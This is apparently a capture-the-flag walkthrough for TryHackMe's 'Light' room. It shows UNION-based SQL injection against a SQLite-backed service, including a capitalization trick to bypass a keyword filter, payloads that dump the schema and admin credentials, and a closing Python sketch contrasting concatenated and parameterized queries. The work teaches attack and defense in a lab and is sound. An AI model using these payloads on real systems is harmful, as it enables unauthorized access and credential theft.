Understanding SQL Injection in CTF TryHackMe Light
This guide walks you through identifying and exploiting SQL injection vulnerabilities in the Light database application on TryHackMe. You'll learn various SQL injection techniques to extract information from the database.
Key Points
- SQL Injection: A code injection technique in which user input alters the SQL query an application runs; it can destroy your database.
- SQLite Database: The application likely uses SQLite, a lightweight database engine.
- Payload Testing: Various payloads are tested to identify vulnerabilities.
- Database Schema: Extracting the database schema to understand its structure.
- Data Extraction: Retrieving sensitive information such as usernames and passwords.
Connecting to the Application
To start, connect to the application using the provided details:
nc xx.xx.xxx.xx 1337
Use the username smokey to get started.
Testing for SQL Injection
Initial Test
Instead of using the provided username, try using a single quote ('):
nc xx.xx.xxx.xx 1337
You should receive an error:
Error: unrecognized token: "''' LIMIT 30"
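This indicates a potential SQL injection vulnerability: the quote reached the SQL parser unescaped, and the token in the error shows that the input is placed inside a single-quoted string followed by LIMIT 30.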
Payload Testing
Try the following payloads to see if they are blocked:
smokey' OR '1'='1' --
UNION
SELECT
You will receive messages indicating that certain inputs are not allowed.
Capitalizing SQL Terms
Try capitalizing SQL terms to bypass filters:
Union
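You should receive the following instead of a "not allowed" message, which shows the filter matches keywords case-sensitively: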
Username not found.
Extracting Database Information
Identifying the Database Version
Use the payload:
smokey' Union Select sqlite_version()'
You should receive:
3.31.1
This confirms the use of a SQLite database.
Extracting the Database Schema
Use the payload:
smokey' Union Select sql FROM sqlite_master'
You should receive:
CREATE TABLE admintable (
id INTEGER PRIMARY KEY,
username TEXT,
password INTEGER)
This describes the database's schema.
Retrieving Usernames and Passwords
Use the following payloads to extract usernames and passwords:
smokey' Union Select username FROM admintable'
You should receive:
TryHackMeAdmin
To get the password:
smokey' Union Select password FROM admintable WHERE username='TryHackMeAdmin''
You should receive:
vYQ5ngPpw8AdUmL
Learn More
For more information on SQL injection and how to protect against it, consider exploring resources on SQL injection prevention and database security best practices.
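As an added example (not code from the Light application or from this guide), the Python sketch below reproduces the behaviour observed above, a quoted string concatenated into a query ending in LIMIT 30 behind a case-sensitive keyword filter, next to a parameterized lookup that treats the same inputs as plain data. The table usertable, the function names, the filter list and all rows are assumptions constructed for illustration.

```python
import sqlite3

def make_db():
    # Constructed stand-in database; table names and rows are assumptions.
    db = sqlite3.connect(":memory:")
    db.executescript("""
        CREATE TABLE usertable (username TEXT, password TEXT);
        INSERT INTO usertable VALUES ('smokey', 'constructed-user-pw');
        CREATE TABLE admintable (id INTEGER PRIMARY KEY, username TEXT, password TEXT);
        INSERT INTO admintable (username, password) VALUES ('admin', 'constructed-admin-pw');
    """)
    return db

BLOCKED = ("UNION", "SELECT")  # assumed filter: exact-case substring match

def _render(rows):
    return "\n".join(str(r[0]) for r in rows) if rows else "Username not found."

def lookup_vulnerable(db, username):
    # The filter only sees upper-case spellings, but SQL keywords are
    # case-insensitive, so "Union" passes the check and still parses.
    if any(word in username for word in BLOCKED):
        return "Input not allowed."
    # The input is pasted between the quotes, so a ' in it ends the literal
    # and everything after it is parsed as SQL.
    query = "SELECT password FROM usertable WHERE username = '" + username + "' LIMIT 30"
    try:
        return _render(db.execute(query).fetchall())
    except sqlite3.Error as exc:
        return "Error: " + str(exc)

def lookup_hardened(db, username):
    # The ? placeholder binds the input as a value. It is never parsed as
    # SQL, so quotes and keywords in it are just characters to compare.
    rows = db.execute(
        "SELECT password FROM usertable WHERE username = ? LIMIT 30", (username,)
    ).fetchall()
    return _render(rows)

if __name__ == "__main__":
    db = make_db()
    for name in ("smokey", "'", "UNION", "smokey' Union Select sqlite_version()'"):
        print(repr(name), "->", repr(lookup_vulnerable(db, name)),
              "|", repr(lookup_hardened(db, name)))
```

With parameter binding the keyword filter becomes unnecessary, and database errors should be logged server-side rather than echoed to the client as the vulnerable version does.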